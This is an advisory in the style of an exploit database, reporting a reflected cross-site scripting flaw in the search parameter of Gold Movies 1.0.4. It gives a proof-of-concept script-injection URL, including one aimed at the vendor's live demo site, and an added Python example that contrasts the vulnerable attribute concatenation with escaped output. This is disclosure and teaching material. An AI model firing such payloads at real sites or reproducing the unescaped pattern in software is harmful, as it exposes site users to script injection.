# Exploit Title: Gold Movies 1.0.4 - Cross-site Script
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://codecanyon.net/user/themesgold
# Software Link: https://codecanyon.net/item/gold-movies/11371340
# Demo Website: http://themes-gold.com/movies/
# Version: 1.0.4
# Tested on: WIN7_x68/Linux
# CVE : N/A

# Description:
An XSS vulnerability was found in the search section of "Gold Movies 1.0.4" (the q parameter of /search).

# POC Request:
http://[PATH]/search?q="><script>alert('Deyaa')</script>

# Live Target:
http://themes-gold.com/movies/search?q="><script>alert('Deyaa')</script>
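The leading `">` in the PoC value suggests that q is echoed back inside a quoted HTML attribute. The sketch below is an added example, not code from Gold Movies or from the advisory author: it renders the PoC value with raw interpolation and with attribute-safe encoding, then parses both results to show which one yields a live script element. The template, the function names and the host example.invalid are assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Constructed sample: the PoC query string from this page on a placeholder host.
POC_URL = "http://example.invalid/search?q=\"><script>alert('Deyaa')</script>"


def get_q(url):
    """Extract the q parameter roughly as a web framework would."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(q):
    # Hypothetical template: the raw value is concatenated into the attribute.
    return '<input type="text" name="q" value="' + q + '">'


def render_hardened(q):
    # quote=True also encodes " and ', so the value cannot close the
    # attribute or open a new tag.
    return '<input type="text" name="q" value="' + html.escape(q, quote=True) + '">'


class TagCollector(HTMLParser):
    """Records every start tag an HTML parser sees, with its attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_tags(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    q = get_q(POC_URL)
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        names = [tag for tag, _ in parsed_tags(render(q))]
        print(f"{name:10} parsed tags: {names}")
```

In the hardened output the parser sees a single input element whose value attribute decodes back to the original search string, so the search term is still displayed to the user as typed.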